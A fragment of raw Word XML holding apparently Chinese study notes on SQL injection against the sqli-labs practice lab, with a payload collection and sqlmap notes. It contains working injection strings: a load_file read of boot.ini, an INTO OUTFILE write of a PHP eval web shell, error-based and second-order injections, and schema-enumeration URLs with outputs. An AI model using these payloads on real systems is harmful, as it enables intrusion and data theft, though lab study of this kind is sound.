      </w:pPr>
      <w:r w:rsidRPr="00556F3C">
        <w:t>1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F713CA" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRPr="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BEEEEC" w14:textId="128B8764" w:rsidR="00FD6587" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364E0A1" w14:textId="00E65EEA" w:rsidR="00FD6587" w:rsidRPr="00556F3C" w:rsidRDefault="00556F3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556F3C">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SELECT.....INTO OUTFILE 'file_name'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244C2BBF" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15EB168B" w14:textId="6E8B3367" w:rsidR="00FD6587" w:rsidRDefault="003A0EB2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;?php @eval($_POST['mima']);?&gt; into outfile "C:\\test.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CB291D" w14:textId="77777777" w:rsidR="002054B1" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB64B35" w14:textId="77777777" w:rsidR="002054B1" w:rsidRDefault="002054B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF00B16" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E61FBD" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRPr="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="415C59D8" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEF988D" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14252A62" w14:textId="1242CF8E" w:rsidR="00BA3545" w:rsidRDefault="00BA3545" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc159779475"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法注释，同时过滤前后单引号</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="18BC0DFA" w14:textId="70D79F28" w:rsidR="00FD6587" w:rsidRDefault="00BA3545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT * FROM users WHERE id='-1' union select 1,@@datadir,'3' LIMIT 0,1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170DE81" w14:textId="77777777" w:rsidR="00FD6587" w:rsidRDefault="00FD6587" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6214B48E" w14:textId="1454C447" w:rsidR="00FD6587" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc159779476"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:r>
        <w:t>-labs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特别关注题目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="17716C14" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D16C07" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A1160" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E958A2" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. less11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万能密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA00A3" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> user-agent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7597C" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5. 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830D605" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6. 23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，过滤注释，就同时闭合前后的单引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F4DD8" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT * FROM users WHERE id='-1' union select 1,@@datadir,'3' LIMIT 0,1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA0AA5" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7. 24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，二次注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E67381B" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册用户</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CCB0A" w14:textId="28E02752" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改密变一下，原始密码可以不动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C09A169" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRPr="00AF6E60" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01FB346B" w14:textId="1A18B2C9" w:rsidR="0088001C" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="002F6D65">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暂时刷到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4B3ECA" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692698A8" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131CDA8A" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60886ABA" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209D6490" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791194B9" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771911CA" w14:textId="77777777" w:rsidR="002F6D65" w:rsidRDefault="002F6D65" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B9B943" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FCF922" w14:textId="77777777" w:rsidR="00AF6E60" w:rsidRDefault="00AF6E60" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25960D23" w14:textId="6848C602" w:rsidR="00002710" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc159779477"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的优秀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汇总</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1855C3D2" w14:textId="77777777" w:rsidR="00002710" w:rsidRDefault="00002710" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E525B24" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="587F4201" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>less1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2513F69C" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E874C6" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/Less-1/?id=-1'+union+select+222,GROUP_CONCAT(DISTINCT+table_schema+SEPARATOR+',+'),4444+AS+concatenated_schemas+FROM+information_schema.columns%3b--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D488F3" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3596B4E2" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>information_schema, challenges, mysql, performance_schema, security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A61D70" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC43BA4" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取特定库的表命</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30B00F" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/Less-1/?id=-1' union select 222,GROUP_CONCAT(DISTINCT table_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security';-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF131A" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DECBC9D" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>emails, referers, uagents, users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CA9A6" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D5449B" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取特定库的特定表的字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB5DF86" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-1' union select 222,GROUP_CONCAT(DISTINCT column_name SEPARATOR ', '),4444 AS concatenated_schemas FROM information_schema.columns where table_schema='security' and table_name='users';-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D0333" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80AE8A" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>id, username, password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4DD5E" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539D3517" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>less3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510A9A4E" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过报错得知原本是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>('1')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种字符串结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECE9235" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1')--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBB5FF" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>判断列数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311E110" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/Less-3/?id=1') order by 3-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF3EC2A" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB800CB" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D033732" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>less4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6975FF" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/Less-4/?id=2")+order+by+7--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE082C9" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原来可以使用双引号对字符串的值进行包裹。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F066056" w14:textId="77777777" w:rsidR="0088001C" w:rsidRDefault="0088001C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6A09CC" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc159779478"/>
      <w:r>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="4806B405" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443506A6" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的库（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CD82F" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MySQL, Oracle, PostgreSQL, Microsoft SQL Server,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0E60A9" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft Access, IBM DB2, SQLite, Firebird, Sybase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SAP MaxDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F0837" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的注入模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔、时间、报错盲注，联合查询注入，堆查询注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AF123" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD1864E" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique B  : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定布尔盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A6030" w14:textId="77777777" w:rsidR="00B57872" w:rsidRDefault="00B57872" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔型注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  E  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错型注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
